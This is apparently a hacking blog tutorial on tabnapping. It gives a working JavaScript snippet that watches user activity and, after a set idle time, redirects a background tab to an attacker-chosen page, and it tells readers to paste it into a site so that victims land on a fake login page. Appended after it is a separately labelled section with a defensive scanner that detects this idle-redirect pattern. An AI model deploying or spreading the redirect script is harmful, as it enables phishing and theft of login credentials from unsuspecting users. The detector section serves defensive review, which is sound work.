People who are aware of phishing might also know that, by looking at the URL in the address bar, it is easy to tell whether a page is genuine or not. What I mean is that nowadays phishing is caught easily if the person being fooled is technically sound.
So a newer way to work with fake login pages is tabnapping, which gives a better chance of fooling the person than sending them directly to a phishing page.
Tabnapping: tabnapping uses a JavaScript snippet whose function is to redirect the page in which it is included to a different page, i.e. your phishing page, after a specific amount of time.
For example: include the tabnapping script in any page of your website and wait for the timer set in the script to redirect the original page to your fake page, or a genuine one, whichever fits best.
It is a common habit, when working in a browser like Mozilla or Chrome, to browse through different tabs. So you open the page that contains the JavaScript, move on to other tabs, and while you are busy working in them the page gets redirected to the fake page after the time that was specified, which can be anything such as 10 sec, 5 sec or 5 mins.
Let's see how it works!
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
    if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
        xScroll = document.body.scrollLeft;
        yScroll = document.body.scrollTop;
        clearInterval(timerPoll); //stop polling scroll move
        clearInterval(timerRedirect); //stop timed redirect
        timerPoll = setInterval("pollActivity()",1); //poll scrolling
        timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
    }
    else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
        xScroll = window.pageXOffset;
        yScroll = window.pageYOffset;
        clearInterval(timerPoll); //stop polling scroll move
        clearInterval(timerRedirect); //stop timed redirect
        timerPoll = setInterval("pollActivity()",1); //poll scrolling
        timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
    }
    //else do nothing
}
function pollActivity(){
    if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
        ||
        (typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
        initRedirect(); //reset polling scroll position
    }
}
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
In the above script you can see the website you are redirected to, i.e. www.gmail.com, and the time, which is 10 seconds. All you need to do is copy and paste the script into the web page that you want to redirect to a fake page and see if it works.
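The script above combines three things a reviewer can look for when auditing third-party or user-supplied JavaScript: input handlers that restart a timer, a `setInterval`/`setTimeout` call, and a literal navigation to another origin. The scanner below is an added example, not code from the original post; `analyzeScript`, both sample strings and the `blog.example` / `app.example` origins are constructed assumptions.

```javascript
// Added example, not from the original post. Static heuristic for the
// idle-timer redirect pattern; names and sample inputs are constructed.
const ACTIVITY_HOOK = /\b(?:document|window)\.on(mousemove|click|keydown|scroll|resize)\s*=|addEventListener\(\s*['"](mousemove|click|keydown|scroll|resize)['"]/g;
const TIMER = /\bset(?:Interval|Timeout)\s*\(/g;
const NAVIGATION = /\blocation(?:\.href)?\s*=\s*['"]([^'"]+)['"]|\blocation\.(?:assign|replace)\(\s*['"]([^'"]+)['"]/g;

function analyzeScript(source, pageUrl) {
  const page = new URL(pageUrl);
  // Input handlers that could be used to restart an idle timer.
  const hooks = [...source.matchAll(ACTIVITY_HOOK)].map(m => m[1] || m[2]);
  const timers = [...source.matchAll(TIMER)].length;
  // Literal navigation targets, resolved against the page, that leave its origin.
  const crossOriginTargets = [];
  for (const m of source.matchAll(NAVIGATION)) {
    let target;
    try { target = new URL(m[1] || m[2], page); } catch (e) { continue; }
    if (target.origin !== page.origin) crossOriginTargets.push(target.href);
  }
  // Flag only when all three ingredients appear in the same script.
  const suspicious = timers > 0 && hooks.length > 0 && crossOriginTargets.length > 0;
  return { hooks: [...new Set(hooks)], timers, crossOriginTargets, suspicious };
}

// Constructed sample 1: condensed form of the script shown in this post.
const SAMPLE_IDLE_REDIRECT = `
function initRedirect(){
  clearInterval(timerRedirect);
  timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);
}
document.onmousemove=initRedirect;
document.onkeydown=initRedirect;
`;

// Constructed sample 2: an ordinary same-origin session timeout.
const SAMPLE_SESSION_TIMEOUT = `
function resetTimer(){
  clearTimeout(t);
  t = setTimeout(function(){ location.href = '/logout'; }, 900000);
}
document.onkeydown = resetTimer;
`;

console.log(analyzeScript(SAMPLE_IDLE_REDIRECT, 'http://blog.example/post.html'));
console.log(analyzeScript(SAMPLE_SESSION_TIMEOUT, 'https://app.example/home'));
```

Same-origin idle timers such as session timeouts are common, which is why the check keys on a cross-origin target; it only sees literal URLs, so a hit is a prompt for manual review rather than a verdict.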
Contact => www.facebook.com/ryan.manjothi